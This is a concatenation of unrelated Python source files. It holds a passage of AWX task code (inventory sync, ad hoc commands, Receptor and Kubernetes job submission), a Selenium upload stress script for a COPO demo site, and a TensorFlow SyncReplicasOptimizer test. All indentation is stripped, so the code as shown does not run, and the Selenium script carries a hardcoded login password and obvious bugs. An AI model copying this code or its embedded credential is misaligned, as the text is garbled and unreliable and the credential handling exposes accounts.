sync_needs = ['update_{}'.format(source_project.scm_type)]
has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
# Galaxy requirements are not supported for manual projects
if not has_cache:
sync_needs.extend(['install_roles', 'install_collections'])
local_project_sync = source_project.create_project_update(
_eager_fields=dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
execution_node=inventory_update.execution_node,
instance_group=inventory_update.instance_group,
celery_task_id=inventory_update.celery_task_id,
)
)
# associate the inventory update before calling run() so that a
# cancel() call on the inventory update can cancel the project update
local_project_sync.scm_inventory_updates.add(inventory_update)
project_update_task = local_project_sync._get_task_class()
try:
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
except Exception:
inventory_update = self.update_model(
inventory_update.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
# This follows update, not sync, so make copy here
RunProjectUpdate.make_local_copy(source_project, private_data_dir)
def post_run_hook(self, inventory_update, status):
super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
if status != 'successful':
return # nothing to save, step out of the way to allow error reporting
private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
with open(expected_output) as f:
data = json.load(f)
# build inventory save options
options = dict(
overwrite=inventory_update.overwrite,
overwrite_vars=inventory_update.overwrite_vars,
)
src = inventory_update.source
if inventory_update.enabled_var:
options['enabled_var'] = inventory_update.enabled_var
options['enabled_value'] = inventory_update.enabled_value
else:
if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())
if inventory_update.host_filter:
options['host_filter'] = inventory_update.host_filter
if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
options['exclude_empty_groups'] = True
if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())
# Verbosity is applied to saving process, as well as ansible-inventory CLI option
if inventory_update.verbosity:
options['verbosity'] = inventory_update.verbosity
handler = SpecialInventoryHandler(
self.event_handler,
self.cancel_callback,
verbosity=inventory_update.verbosity,
job_timeout=self.get_instance_timeout(self.instance),
start_time=inventory_update.started,
counter=self.event_ct,
initial_line=self.end_line,
)
inv_logger = logging.getLogger('awx.main.commands.inventory_import')
formatter = inv_logger.handlers[0].formatter
formatter.job_start = inventory_update.started
handler.formatter = formatter
inv_logger.handlers[0] = handler
from awx.main.management.commands.inventory_import import Command as InventoryImportCommand
cmd = InventoryImportCommand()
try:
# save the inventory data to database.
# canceling exceptions will be handled in the global post_run_hook
cmd.perform_update(options, data, inventory_update)
except PermissionDenied as exc:
logger.exception('License error saving {} content'.format(inventory_update.log_format))
raise PostRunError(str(exc), status='error')
except PostRunError:
logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
raise
except Exception:
logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
"""
Run an ad hoc command using ansible.
"""
model = AdHocCommand
event_model = AdHocCommandEvent
event_data_key = 'ad_hoc_command_id'
def build_private_data(self, ad_hoc_command, private_data_dir):
"""
Return SSH private key data needed for this ad hoc command (only if
stored in DB as ssh_key_data).
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
creds = ad_hoc_command.credential
private_data = {'credentials': {}}
if creds and creds.has_input('ssh_key_data'):
private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
if creds and creds.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, ad_hoc_command, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user and
sudo/su.
"""
passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
cred = ad_hoc_command.credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
return passwords
def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible.
"""
env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
# Set environment variables needed for inventory and ad hoc event
# callbacks to work.
env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
env['INVENTORY_HOSTVARS'] = str(True)
env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'
return env
def build_args(self, ad_hoc_command, private_data_dir, passwords):
"""
Build command line argument list for running ansible, optionally using
ssh-agent for public/private key authentication.
"""
creds = ad_hoc_command.credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible's default of using the
# current user.
ssh_username = ssh_username or 'root'
args = []
if ad_hoc_command.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
# We only specify sudo/su user and password if explicitly given by the
# credential. Credential should never specify both sudo and su.
if ad_hoc_command.become_enabled:
args.append('--become')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
if ad_hoc_command.forks: # FIXME: Max limit?
args.append('--forks=%d' % ad_hoc_command.forks)
if ad_hoc_command.diff_mode:
args.append('--diff')
if ad_hoc_command.verbosity:
args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
if ad_hoc_command.limit:
args.append(ad_hoc_command.limit)
else:
args.append('all')
return args
def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
extra_vars = ad_hoc_command.awx_meta_vars()
if ad_hoc_command.extra_vars_dict:
redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
if removed_vars:
raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
extra_vars.update(ad_hoc_command.extra_vars_dict)
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_module_name(self, ad_hoc_command):
return ad_hoc_command.module_name
def build_module_args(self, ad_hoc_command):
module_args = ad_hoc_command.module_args
if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
module_args = sanitize_jinja(module_args)
return module_args
def build_cwd(self, ad_hoc_command, private_data_dir):
return private_data_dir
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def get_password_prompts(self, passwords={}):
d = super(RunAdHocCommand, self).get_password_prompts()
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
model = SystemJob
event_model = SystemJobEvent
event_data_key = 'system_job_id'
def build_execution_environment_params(self, system_job, private_data_dir):
return {}
def build_args(self, system_job, private_data_dir, passwords):
args = ['awx-manage', system_job.job_type]
try:
# System Job extra_vars can be blank, must be JSON if not blank
if system_job.extra_vars == '':
json_vars = {}
else:
json_vars = json.loads(system_job.extra_vars)
if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
if 'days' in json_vars:
args.extend(['--days', str(json_vars.get('days', 60))])
if 'dry_run' in json_vars and json_vars['dry_run']:
args.extend(['--dry-run'])
if system_job.job_type == 'cleanup_jobs':
args.extend(
['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
)
except Exception:
logger.exception("{} Failed to parse system job".format(system_job.log_format))
return args
def write_args_file(self, private_data_dir, args):
path = os.path.join(private_data_dir, 'args')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(' '.join(args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_env(self, instance, private_data_dir, private_data_files=None):
base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
# TODO: this is able to run by turning off isolation
# the goal is to run it a container instead
env = dict(os.environ.items())
env.update(base_env)
return env
def build_cwd(self, instance, private_data_dir):
return settings.BASE_DIR
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return None
def build_inventory(self, instance, private_data_dir):
return None
def _reconstruct_relationships(copy_mapping):
for old_obj, new_obj in copy_mapping.items():
model = type(old_obj)
for field_name in getattr(model, 'FIELDS_TO_PRESERVE_AT_COPY', []):
field = model._meta.get_field(field_name)
if isinstance(field, ForeignKey):
if getattr(new_obj, field_name, None):
continue
related_obj = getattr(old_obj, field_name)
related_obj = copy_mapping.get(related_obj, related_obj)
setattr(new_obj, field_name, related_obj)
elif field.many_to_many:
for related_obj in getattr(old_obj, field_name).all():
logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(related_obj, new_obj, model, field_name))
getattr(new_obj, field_name).add(copy_mapping.get(related_obj, related_obj))
new_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
sub_obj_list = cache.get(uuid)
if sub_obj_list is None:
logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
return
logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
from awx.api.generics import CopyAPIView
from awx.main.signals import disable_activity_stream
model = getattr(importlib.import_module(model_module), model_name, None)
if model is None:
return
try:
obj = model.objects.get(pk=obj_pk)
new_obj = model.objects.get(pk=new_obj_pk)
creater = User.objects.get(pk=user_pk)
except ObjectDoesNotExist:
logger.warning("Object or user no longer exists.")
return
with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
copy_mapping = {}
for sub_obj_setup in sub_obj_list:
sub_model = getattr(importlib.import_module(sub_obj_setup[0]), sub_obj_setup[1], None)
if sub_model is None:
continue
try:
sub_obj = sub_model.objects.get(pk=sub_obj_setup[2])
except ObjectDoesNotExist:
continue
copy_mapping.update(CopyAPIView.copy_model_obj(obj, new_obj, sub_model, sub_obj, creater))
_reconstruct_relationships(copy_mapping)
if permission_check_func:
permission_check_func = getattr(getattr(importlib.import_module(permission_check_func[0]), permission_check_func[1]), permission_check_func[2])
permission_check_func(creater, copy_mapping.values())
if isinstance(new_obj, Inventory):
update_inventory_computed_fields.delay(new_obj.id)
class AWXReceptorJob:
def __init__(self, task=None, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params['settings'].update(execution_environment_params)
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = ReceptorControl('/var/run/receptor/receptor.sock')
try:
return self._run_internal(receptor_ctl)
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
receptor_ctl.simple_command(f"work release {self.unit_id}")
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
threading.Thread(target=self.transmit, args=[sockin]).start()
# submit our work, passing
# in the right side of our socketpair for reading.
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params)
self.unit_id = result['unitid']
sockin.close()
sockout.close()
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
# to exit. A reference to the processor_future is passed into the cancel_watcher_future,
# Which exits if the job has finished normally. The context manager ensures we do not
# leave any threads laying around.
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
processor_future = executor.submit(self.processor, resultfile)
cancel_watcher_future = executor.submit(self.cancel_watcher, processor_future)
futures = [processor_future, cancel_watcher_future]
first_future = concurrent.futures.wait(futures, return_when=concurrent.futures.FIRST_COMPLETED)
res = list(first_future.done)[0].result()
if res.status == 'canceled':
receptor_ctl.simple_command(f"work cancel {self.unit_id}")
resultsock.shutdown(socket.SHUT_RDWR)
resultfile.close()
elif res.status == 'error':
# TODO: There should be a more efficient way of getting this information
receptor_work_list = receptor_ctl.simple_command("work list")
detail = receptor_work_list[self.unit_id]['Detail']
state_name = receptor_work_list[self.unit_id]['StateName']
if 'exceeded quota' in detail:
logger.warn(detail)
log_name = self.task.instance.log_format
logger.warn(f"Could not launch pod for {log_name}. Exceeded quota.")
self.task.update_model(self.task.instance.pk, status='pending')
return
# If ansible-runner ran, but an error occured at runtime, the traceback information
# is saved via the status_handler passed in to the processor.
if state_name == 'Succeeded':
return res
raise RuntimeError(detail)
return res
# Spawned in a thread so Receptor can start reading before we finish writing, we
# write our payload to the left side of our socketpair.
def transmit(self, _socket):
if not settings.IS_K8S and self.work_type == 'local':
self.runner_params['only_transmit_kwargs'] = True
ansible_runner.interface.run(streamer='transmit', _output=_socket.makefile('wb'), **self.runner_params)
# Socket must be shutdown here, or the reader will hang forever.
_socket.shutdown(socket.SHUT_WR)
def processor(self, resultfile):
return ansible_runner.interface.run(
streamer='process',
quiet=True,
_input=resultfile,
event_handler=self.task.event_handler,
finished_callback=self.task.finished_callback,
status_handler=self.task.status_handler,
**self.runner_params,
)
@property
def receptor_params(self):
if self.task.instance.is_container_group_task:
spec_yaml = yaml.dump(self.pod_definition, explicit_start=True)
receptor_params = {
"secret_kube_pod": spec_yaml,
}
if self.credential:
kubeconfig_yaml = yaml.dump(self.kube_config, explicit_start=True)
receptor_params["secret_kube_config"] = kubeconfig_yaml
else:
private_data_dir = self.runner_params['private_data_dir']
receptor_params = {"params": f"--private-data-dir={private_data_dir}"}
return receptor_params
@property
def work_type(self):
if self.task.instance.is_container_group_task:
if self.credential:
work_type = 'kubernetes-runtime-auth'
else:
work_type = 'kubernetes-incluster-auth'
else:
work_type = 'local'
return work_type
def cancel_watcher(self, processor_future):
while True:
if processor_future.done():
return processor_future.result()
if self.task.cancel_callback():
result = namedtuple('result', ['status', 'rc'])
return result('canceled', 1)
if hasattr(self, 'unit_id') and 'RECEPTOR_UNIT_ID' not in self.task.instance.job_env:
self.task.instance.job_env['RECEPTOR_UNIT_ID'] = self.unit_id
self.task.update_model(self.task.instance.pk, job_env=self.task.instance.job_env)
time.sleep(1)
@property
def pod_definition(self):
if self.task:
ee = self.task.instance.resolve_execution_environment()
else:
ee = get_default_execution_environment()
default_pod_spec = get_default_pod_spec()
pod_spec_override = {}
if self.task and self.task.instance.instance_group.pod_spec_override:
pod_spec_override = parse_yaml_or_json(self.task.instance.instance_group.pod_spec_override)
pod_spec = {**default_pod_spec, **pod_spec_override}
pod_spec['spec']['containers'][0]['image'] = ee.image
pod_spec['spec']['containers'][0]['args'] = ['ansible-runner', 'worker', '--private-data-dir=/runner']
if self.task:
pod_spec['metadata'] = deepmerge(
pod_spec.get('metadata', {}),
dict(name=self.pod_name, labels={'ansible-awx': settings.INSTALL_UUID, 'ansible-awx-job-id': str(self.task.instance.id)}),
)
return pod_spec
@property
def pod_name(self):
return f"automation-job-{self.task.instance.id}"
@property
def credential(self):
return self.task.instance.instance_group.credential
@property
def namespace(self):
return self.pod_definition['metadata']['namespace']
@property
def kube_config(self):
host_input = self.credential.get_input('host')
config = {
"apiVersion": "v1",
"kind": "Config",
"preferences": {},
"clusters": [{"name": host_input, "cluster": {"server": host_input}}],
"users": [{"name": host_input, "user": {"token": self.credential.get_input('bearer_token')}}],
"contexts": [{"name": host_input, "context": {"cluster": host_input, "user": host_input, "namespace": self.namespace}}],
"current-context": host_input,
}
if self.credential.get_input('verify_ssl') and 'ssl_ca_cert' in self.credential.inputs:
config["clusters"][0]["cluster"]["certificate-authority-data"] = b64encode(
self.credential.get_input('ssl_ca_cert').encode() # encode to bytes
).decode() # decode the base64 data into a str
else:
config["clusters"][0]["cluster"]["insecure-skip-tls-verify"] = True
return config
|
stress_copo_upload.py
|
from unittest import TestCase
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
import threading
import os
def _upload():
options = Options()
options.headless = False
client = webdriver.Firefox(options=options)
url = "http://demo.copo-project.org/copo"
client.get(url)
login_link = client.find_element_by_class_name("login-button")
login_link.click()
# sign into orcid
username = client.find_element_by_id("userId")
username.send_keys("[email protected]")
username = client.find_element_by_id("password")
username.send_keys("Apple123")
login_submit = client.find_element_by_id("form-sign-in-button")
login_submit.click()
# check for authorize
try:
authorize = WebDriverWait(client, 4).until(
EC.presence_of_element_located((By.ID, "authorize"))
)
authorize.click()
except:
pass
if "COPO" not in client.title:
return False
client.close()
# go to uploads page
element = client.find_elements_by_partial_link_text("Datafile")
if type(element) is type(list()):
element = element[0]
element.click()
WebDriverWait(client, 0.5)
element = client.find_element(By.LINK_TEXT, "Upload")
element.click()
try:
file_upload = WebDriverWait(client, 4).until(
EC.presence_of_element_located((By.NAME, "file"))
)
f = client.find_element_by_name("file")
client.execute_script("$('input[type=\"file\"]').val('/Users/fshaw/Desktop/small1_test.fastq'); $('input[type=\"file\"]').change()")
#f.send_keys("/Users/fshaw/Desktop/small1_test.fastq")
#doc = client.find_element_by_xpath("//html")
#doc.click()
except e:
print(e)
try:
hash = WebDriverWait(client, 3).until(
EC.presence_of_element_located((By.CSS_SELECTOR, ".hash_span"))
)
print("file hashed....exiting")
except:
print("File not hashed")
finally:
#pass
client.close()
def _test_text():
url = "http://127.0.0.1:8000/copo/test"
options = Options()
options.headless = False
client = webdriver.Firefox(options=options)
client.get(url)
el = client.find_element_by_id("input_text")
el.send_keys("here")
for m in range(0, 1):
#t = threading.Thread(target=_upload)
t = threading.Thread(target=_upload)
t.start()
|
sync_replicas_optimizer_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sync_replicas_optimizer.py."""
import time
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework.test_util import create_local_cluster
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import training
# Creates the workers and return their sessions, graphs, train_ops.
def get_workers(num_workers, replicas_to_aggregate, workers):
sessions = []
graphs = []
train_ops = []
for worker_id in range(num_workers):
graph = ops.Graph()
is_chief = (worker_id == 0)
with graph.as_default():
with ops.device("/job:ps/task:0"):
global_step = variables.VariableV1(
0, name="global_step", trainable=False)
var_0 = variables.VariableV1(0.0, name="v0")
with ops.device("/job:ps/task:1"):
var_1 = variables.VariableV1(1.0, name="v1")
var_sparse = variables.VariableV1([[3.0], [4.0]], name="v_sparse")
with ops.device("/job:worker/task:" + str(worker_id)):
grads_0 = constant_op.constant(0.1 + worker_id * 0.2)
grads_1 = constant_op.constant(0.9 + worker_id * 0.2)
# This is to test against sparse gradients.
grads_sparse = ops.IndexedSlices(
constant_op.constant(
[0.1 + worker_id * 0.2], shape=[1, 1]),
constant_op.constant([1]),
constant_op.constant([2, 1]))
sgd_opt = gradient_descent.GradientDescentOptimizer(2.0)
sync_rep_opt = training.SyncReplicasOptimizer(
sgd_opt,
replicas_to_aggregate=replicas_to_aggregate,
total_num_replicas=num_workers)
train_op = [
sync_rep_opt.apply_gradients(
zip([grads_0, grads_1, grads_sparse],
[var_0, var_1, var_sparse]),
global_step=global_step)
]
sync_replicas_hook = sync_rep_opt.make_session_run_hook(
is_chief, num_tokens=num_workers)
# Creates MonitoredSession
session = training.MonitoredTrainingSession(
master=workers[worker_id].target,
is_chief=is_chief,
hooks=[sync_replicas_hook])
sessions.append(session)
graphs.append(graph)
train_ops.append(train_op)
return sessions, graphs, train_ops
class SyncReplicasOptimizerTest(test.TestCase):
def _run(self, train_op, sess):
sess.run(train_op)
@test_util.run_v1_only(
"This exercises tensor lookup via names which is not supported in V2.")
def test2Workers(self):
num_workers = 2
replicas_to_aggregate = 2
num_ps = 2
workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
# Creates and returns all the workers.
sessions, graphs, train_ops = get_workers(num_workers,
replicas_to_aggregate, workers)
# Chief should have already initialized all the variables.
var_0_g_0 = graphs[0].get_tensor_by_name("v0:0")
var_1_g_0 = graphs[0].get_tensor_by_name("v1:0")
local_step_0 = graphs[0].get_tensor_by_name("sync_rep_local_step:0")
self.assertAllEqual(0.0, sessions[0].run(var_0_g_0))
self.assertAllEqual(1.0, sessions[0].run(var_1_g_0))
self.assertAllEqual(0, sessions[0].run(local_step_0))
# Will just use session 1 to verify all the variables later.
var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
var_sparse_g_1 = graphs[1].get_tensor_by_name("v_sparse:0")
local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
global_step = graphs[1].get_tensor_by_name("global_step:0")
# The steps should also be initialized.
self.assertAllEqual(0, sessions[1].run(global_step))
self.assertAllEqual(0, sessions[1].run(local_step_1))
self.assertAllClose([[3.0], [4.0]], sessions[1].run(var_sparse_g_1))
# We have initial tokens in the queue so we can call this one by one. After
# the first step, this will no longer work as there will be no more extra
# tokens in the queue.
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
# The global step should have been updated and the variables should now have
# the new values after the average of the gradients are applied.
while sessions[1].run(global_step) != 1:
time.sleep(0.01)
self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
self.assertAllClose([[3.0], [4.0 - (0.1 + 0.3) / 2 * 2.0]],
sessions[1].run(var_sparse_g_1))
# The local step for both workers should still be 0 because the initial
# tokens in the token queue are 0s. This means that the following
# computation of the gradients will be wasted as local_step is smaller than
# the current global step. However, this only happens once when the system
# just starts and this is necessary to make the system robust for the case
# when chief gets restarted by errors/preemption/...
self.assertAllEqual(0, sessions[0].run(local_step_0))
self.assertAllEqual(0, sessions[1].run(local_step_1))
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
# Although the global step should still be 1 as explained above, the local
# step should now be updated to 1. The variables are still the same.
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllEqual(1, sessions[0].run(local_step_0))
self.assertAllEqual(1, sessions[1].run(local_step_1))
self.assertAllClose(0 - (0.1 + 0.3) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.1) / 2 * 2.0, sessions[1].run(var_1_g_1))
# At this step, the token queue is empty. So the 2 workers need to work
# together to proceed.
threads = []
threads.append(
self.checkedThread(
target=self._run, args=(train_ops[0], sessions[0])))
threads.append(
self.checkedThread(
target=self._run, args=(train_ops[1], sessions[1])))
# The two workers starts to execute the train op.
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# The global step should now be 2 and the gradients should have been
# applied twice.
self.assertAllEqual(2, sessions[1].run(global_step))
self.assertAllClose(0 - 2 * (0.1 + 0.3) / 2 * 2.0,
sessions[1].run(var_0_g_1))
self.assertAllClose(1 - 2 * (0.9 + 1.1) / 2 * 2.0,
sessions[1].run(var_1_g_1))
# 3 workers and one of them is backup.
@test_util.run_v1_only(
"This exercises tensor lookup via names which is not supported in V2.")
def test3Workers1Backup(self):
num_workers = 3
replicas_to_aggregate = 2
num_ps = 2
workers, _ = create_local_cluster(num_workers=num_workers, num_ps=num_ps)
# Creates and returns all the workers.
sessions, graphs, train_ops = get_workers(num_workers,
replicas_to_aggregate, workers)
# Chief should have already initialized all the variables.
var_0_g_1 = graphs[1].get_tensor_by_name("v0:0")
var_1_g_1 = graphs[1].get_tensor_by_name("v1:0")
local_step_1 = graphs[1].get_tensor_by_name("sync_rep_local_step:0")
global_step = graphs[1].get_tensor_by_name("global_step:0")
# The steps should also be initialized.
self.assertAllEqual(0, sessions[1].run(global_step))
self.assertAllEqual(0, sessions[1].run(local_step_1))
# We have initial tokens in the queue so we can call this one by one. After
# the token queue becomes empty, they should be called concurrently.
# Here worker 0 and worker 2 finished first.
sessions[0].run(train_ops[0])
sessions[2].run(train_ops[2])
# The global step should have been updated since we only need to collect 2
# gradients. The variables should now have the new values after the average
# of the gradients from worker 0/2 are applied.
while sessions[1].run(global_step) != 1:
time.sleep(0.01)
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllClose(0 - (0.1 + 0.5) / 2 * 2.0, sessions[1].run(var_0_g_1))
self.assertAllClose(1 - (0.9 + 1.3) / 2 * 2.0, sessions[1].run(var_1_g_1))
# Worker 1 finished later and its gradients will now be dropped as it is
# stale.
sessions[1].run(train_ops[1])
# As shown in the previous test, the local_step for all workers should be
# still 0 so their next computation will also be dropped.
sessions[0].run(train_ops[0])
sessions[1].run(train_ops[1])
sessions[2].run(train_ops[2])
# Although the global step should still be 1 as explained above, the local
# step should now be updated to 1. Just check worker 1 as an example.
self.assertAllEqual(1, sessions[1].run(global_step))
self.assertAllEqual(1, sessions[1].run(local_step_1))
thread_0 = self.checkedThread(
target=self._run, args=(train_ops[0], sessions[0]))
thread_1 = self.checkedThread(
target=self._run, args=(train_ops[1], sessions[1]))
# Lets worker 0 execute first.
# It will wait as we need 2 workers to finish this step and the global step
# should be still 1.
thread_0.start()
self.assertAllEqual(1, sessions[1].run(global_step))
# Starts worker 1.
thread_1.start()
thread_1.join()
thread_0.join()
# The global step should now be 2 and the gradients should have been
# applied again.
self.assertAllEqual(2, sessions[1].run(global_step))
self.assertAllClose(-0.6 - (0.1 + 0.3) / 2 * 2.0,
sessions[1].run(var_0_g_1))
self.assertAllClose(-1.2 - (0.9 + 1.1) / 2 * 2.0,
sessions[1].run(var_1_g_1))
class SyncReplicasOptimizerHookTest(test.TestCase):
def testErrorIfUsedBeforeMinimizeCalled(self):
opt = training.SyncReplicasOptimizer(
opt=gradient_descent.GradientDescentOptimizer(1.0),
replicas_to_aggregate=1,
total_num_replicas=1)
hook = opt.make_session_run_hook(True)
with self.assertRaisesRegex(ValueError, "apply_gradient should be called"):
hook.begin()
@test_util.run_v1_only(
"train.SyncReplicasOptimizer and train.GradientDescentOptimizer "
"are V1 only APIs.")
def testCanCreatedBeforeMinimizeCalled(self):
"""This behavior is required to be integrated with Estimators."""
opt = training.SyncReplicasOptimizer(
opt=gradient_descent.GradientDescentOptimizer(1.0),
replicas_to_aggregate=1,
total_num_replicas=1)
hook = opt.make_session_run_hook(True)
v = variables.VariableV1([0.])
global_step = variables.VariableV1(0, name="global_step", trainable=False)
opt.minimize(v, global_step=global_step)
hook.begin()
@test_util.run_v1_only(
"train.SyncReplicasOptimizer and train.AdamOptimizer are V1 only APIs.")
def testFetchVariableList(self):
opt = training.SyncReplicasOptimizer(
opt=adam.AdamOptimizer(0.01),
replicas_to_aggregate=1,
total_num_replicas=1)
v = variables.VariableV1([0.], name="fetch_variable_test")
global_step = variables.VariableV1(0, name="global_step", trainable=False)
opt.minimize(v, global_step=global_step)
opt_variables = opt.variables()
beta1_power, beta2_power = opt._opt._get_beta_accumulators()
self.assertIn(beta1_power, opt_variables)
self.assertIn(beta2_power, opt_variables)
if __name__ == "__main__":
test.main()
|
views.py
|
